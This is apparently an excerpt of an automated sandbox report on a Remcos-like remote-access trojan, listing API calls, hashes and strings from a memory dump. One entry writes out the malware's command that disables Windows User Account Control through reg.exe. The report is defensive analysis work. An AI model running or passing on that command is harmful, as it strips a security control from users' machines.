                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                              • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                              • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                              • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                              • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                              • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                              • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                              • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                              • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                              • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                              APIs
                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Enum$InfoQueryValue
                                                                              • String ID: [regsplt]$DG
                                                                              • API String ID: 3554306468-1089238109
                                                                              • Opcode ID: c127d2cf9b5c89c260adb81f554e6abb521613c945a79df49cd6ee466864448d
                                                                              • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                              • Opcode Fuzzy Hash: c127d2cf9b5c89c260adb81f554e6abb521613c945a79df49cd6ee466864448d
                                                                              • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                              APIs
                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                              • API String ID: 2974294136-753205382
                                                                              • Opcode ID: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                              • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                              • Opcode Fuzzy Hash: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                              • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                              APIs
                                                                              • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                              • GetLastError.KERNEL32 ref: 0041CA91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                              • String ID: 0$MsgWindowClass
                                                                              • API String ID: 2877667751-2410386613
                                                                              • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                              • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                              • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                              • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                              • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                              • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                              Strings
                                                                              • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CreateProcess
                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                              • API String ID: 2922976086-4183131282
                                                                              • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                              • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                              • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                              • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                              • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                              • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                              APIs
                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                              • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                              • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateValue
                                                                              • String ID: pth_unenc$BG
                                                                              • API String ID: 1818849710-2233081382
                                                                              • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                              • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                              • String ID: KeepAlive | Disabled
                                                                              • API String ID: 2993684571-305739064
                                                                              • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                              • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                              • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                              • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                              APIs
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                              • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                              • String ID: Alarm triggered
                                                                              • API String ID: 614609389-2816303416
                                                                              • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                              • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                              • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                              • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                              Strings
                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                              • API String ID: 3024135584-2418719853
                                                                              • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                              • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                              • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                              • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                              • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                              APIs
                                                                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                              • String ID:
                                                                              • API String ID: 3525466593-0
                                                                              • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                              • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                              • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                              • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                              APIs
                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 4269425633-0
                                                                              • Opcode ID: b947fa994ad0dc43cc2d27d074a9b476dadf369fbeb33aa08de4f1a1173b1a3f
                                                                              • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                              • Opcode Fuzzy Hash: b947fa994ad0dc43cc2d27d074a9b476dadf369fbeb33aa08de4f1a1173b1a3f
                                                                              • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                              • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                              • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                              • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                              • __freea.LIBCMT ref: 0044FFC4
                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                              • String ID:
                                                                              • API String ID: 313313983-0
                                                                              • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                              • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                              • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                              • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                              • _free.LIBCMT ref: 0044E1A0
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                              • String ID:
                                                                              • API String ID: 336800556-0
                                                                              • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                              • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                              • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                              • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                              APIs
                                                                              • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                                              • _free.LIBCMT ref: 00446F7D
                                                                              • _free.LIBCMT ref: 00446FA4
                                                                              • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                                              • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free
                                                                              • String ID:
                                                                              • API String ID: 3170660625-0
                                                                              • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                              • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                              • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                              • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                              APIs
                                                                              • _free.LIBCMT ref: 0044F7B5
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                              • _free.LIBCMT ref: 0044F7C7
                                                                              • _free.LIBCMT ref: 0044F7D9
                                                                              • _free.LIBCMT ref: 0044F7EB
                                                                              • _free.LIBCMT ref: 0044F7FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                              • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
